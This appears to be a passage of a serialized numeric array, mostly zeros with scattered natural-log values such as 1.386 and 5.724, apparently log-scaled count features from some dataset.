0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, \n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 5.075173815233827, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.784189633918261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 10.847027830639663, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0, 0.0, 0.0, 7.471502607305073, 0.0, 0.0, 1.3862943611198906,\n 0.0, 3.4339872044851467, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0, 4.795790545596741, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0, 3.0841946160253877, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 5.278114659230517, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.791759469228055, 0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453,\n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 3.295836866004329, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.58351893845611, 0, \n 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, \n 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 5.723585101952381,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0,\n 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 